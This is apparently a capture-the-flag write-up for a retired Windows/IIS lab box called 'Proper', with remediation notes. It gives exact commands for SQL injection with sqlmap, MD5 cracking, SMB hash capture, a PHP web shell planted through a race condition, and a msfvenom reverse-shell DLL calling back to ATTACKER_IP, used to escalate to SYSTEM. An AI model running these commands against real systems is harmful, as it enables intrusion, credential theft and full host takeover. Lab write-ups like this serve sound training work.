Proper
Summary
The target host exposed only one service: a PHP e-commerce application running on Microsoft IIS. I omitted a required integrity parameter from the product-listing API, crashing the application in a way that printed the application's internal signing secret to the browser. With that secret, any API request could be forged, which unlocked SQL injection against a sort parameter; the resulting database dump contained customer passwords stored as fast, unsalted MD5 hashes that cracked in seconds against a common wordlist.
The cracked credentials authenticated to a second portal whose theme feature passed a caller-supplied path directly to PHP file-read and file-include calls. Pointing the path at my own file server forced the IIS worker to authenticate outward over SMB, leaking the service account credential hash, while also giving me control over what file content the portal read. A race condition between the portal's content-safety check and its subsequent file-include was won by serving a harmless oversized decoy, then swapping in a PHP backdoor mid-request, yielding a shell on the Windows host as the web service account and the first flag.
Privilege escalation exploited a custom cleanup utility that ran as NT AUTHORITY\SYSTEM and accepted restore commands over a named pipe that any local user could reach. By staging a malicious DLL, letting the service record its internal tracking entry, rewriting that entry to point at a Windows system directory, and issuing a restore command, I tricked the service into writing the DLL into System32 as SYSTEM. Triggering the Windows Update Orchestrator to load the DLL executed the payload with full system authority, yielding the root flag.
Command conventions
The commands below refer to the target by variable rather than by address. Bind them in your shell before running anything; recovered credentials are withheld and shown as [REDACTED: recovered credential].
export TARGET="<retired-instance-ip>"
export ATTACKER_IP="<your-vpn-address>"
export PASSWORD="<a-password-you-choose>"
export PASSWORD2="<a-password-you-choose>"Attack path — how the box was taken
Exact commands 3
nmap -p- --min-rate 3000 -T4 -Pn $TARGETnmap -sV -Pn -p 80 $TARGETcurl -s http://$TARGET/ | grep -Eo '[a-zA-Z0-9_./-]+\.php[^"< ]*'Exact commands 2
curl -s "http://$TARGET/products-ajax.php?order=name"python3 -c "import hashlib; salt='$PASSWORD2'; order='name'; print(hashlib.md5((salt+order).encode()).hexdigest())"FixDisable verbose PHP error output in every production environmentHigh
Exact commands 2
sqlmap -u "http://$TARGET/products-ajax.php?order=id&h=dummy" -p order --eval="import hashlib; h=hashlib.md5(('$PASSWORD2'+order).encode()).hexdigest()" --batch --level=3 --risk=2 --technique=BEUT --dbms=mysql -D cleaner -T customers --dumphashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt --forceFixAllowlist permitted column names in the products API to eliminate SQL injectionCritical
Exact commands 2
curl -c cookies.txt -d "username=vikki.solomon@throwaway.mail&password=$PASSWORD" http://$TARGET/licenses/python3 -c "import hashlib; theme='\\\\$ATTACKER_IP\\share'; print(hashlib.md5(('$PASSWORD2'+theme).encode()).hexdigest())"FixReplace MD5 password hashing with bcrypt or Argon2idHigh
Exact commands 2
mkdir -p /tmp/serve && impacket-smbserver share /tmp/serve -smb2supportTHEME="\\\\$ATTACKER_IP\\share\\header.inc"; H=$(python3 -c "import hashlib; print(hashlib.md5(('$PASSWORD2'+'$THEME').encode()).hexdigest())"); curl -b cookies.txt "http://$TARGET/licenses/licenses.php?theme=$THEME&h=$H"FixBlock UNC and remote path schemes in all file_get_contents calls that consume user inputCritical
Exact commands 5
dd if=/dev/urandom bs=1M count=1 | base64 > /tmp/serve/header.incprintf '<?php system($_GET["cmd"]); ?>' > /tmp/serve/pwn.incinotifywait -m -e open /tmp/serve/header.inc --format '%e' | while read e; do cp /tmp/serve/pwn.inc /tmp/serve/header.inc; done &THEME="\\\\$ATTACKER_IP\\share\\header.inc"; H=$(python3 -c "import hashlib; print(hashlib.md5(('$PASSWORD2'+'$THEME').encode()).hexdigest())"); for i in $(seq 1 60); do curl -s -b cookies.txt "http://$TARGET/licenses/licenses.php?theme=$THEME&h=$H&cmd=whoami"; doneTHEME="\\\\$ATTACKER_IP\\share\\header.inc"; H=$(python3 -c "import hashlib; print(hashlib.md5(('$PASSWORD2'+'$THEME').encode()).hexdigest())"); curl -s -b cookies.txt "http://$TARGET/licenses/licenses.php?theme=$THEME&h=$H&cmd=type+C:\\Users\\web\\Desktop\\user.txt"FixRead a user-supplied file exactly once and validate its content before passing it to include()Critical
Exact commands 7
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4444 -f dll -o WindowsCoreDeviceInfo.dllcurl -s -b cookies.txt "http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd=copy+\\\\$ATTACKER_IP\\share\\WindowsCoreDeviceInfo.dll+C:\\Users\\web\\Downloads\\WindowsCoreDeviceInfo.dll"curl -s -b cookies.txt 'http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd=powershell+-c+"(Get-Item+C:\\Users\\web\\Downloads\\WindowsCoreDeviceInfo.dll).LastWriteTime+%3d+(Get-Date).AddDays(-35)"'curl -s -b cookies.txt 'http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd="C:\\Program+Files\\cleanup\\client.exe"+CLEAN+"C:\\Users\\web\\Downloads\\WindowsCoreDeviceInfo.dll"'python3 -c "import base64; p='C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll'; print(base64.b64encode(p.encode()).decode()+'A')"curl -s -b cookies.txt 'http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd=powershell+-c+"Rename-Item+C:\\ProgramData\\cleanup\\<old_record>+<new_b64_name>"'curl -s -b cookies.txt 'http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd=powershell+-c+"$p+%3d+[System.IO.Pipes.NamedPipeClientStream]::new(\'.\',\'cleanupPipe\',[System.IO.Pipes.PipeDirection]::InOut);+$p.Connect();+$w+%3d+[System.IO.StreamWriter]::new($p);+$w.AutoFlush%3d%24true;+$w.WriteLine(\'RESTORE\');+Start-Sleep+2;+$p.Dispose()"'FixRun the cleanup service as a least-privilege account and restrict named-pipe access and destination pathsCritical
Exact commands 3
nc -lvnp 4444curl -s -b cookies.txt "http://$TARGET/licenses/licenses.php?theme=...&h=...&cmd=usoclient+StartInteractiveScan"type C:\Users\Administrator\Desktop\root.txtAttack patterns used
The transferable techniques behind this compromise.
SQL InjectionWebT1190
What it is
User input is concatenated into a SQL query, letting an unauthorised user alter the query's logic — bypassing authentication, dumping tables (including password hashes), or, with stacked queries / file privileges, writing webshells or executing OS commands. sqlmap automates detection and exploitation across boolean/error/time/union vectors.
Why it works
The root cause is mixing untrusted data with query code instead of using parameterized statements. Remediate with prepared statements/ORM bindings, least-privilege DB accounts, and input validation.
Read more
Exposed services
| 80/tcp | http Microsoft IIS httpd 10.0 |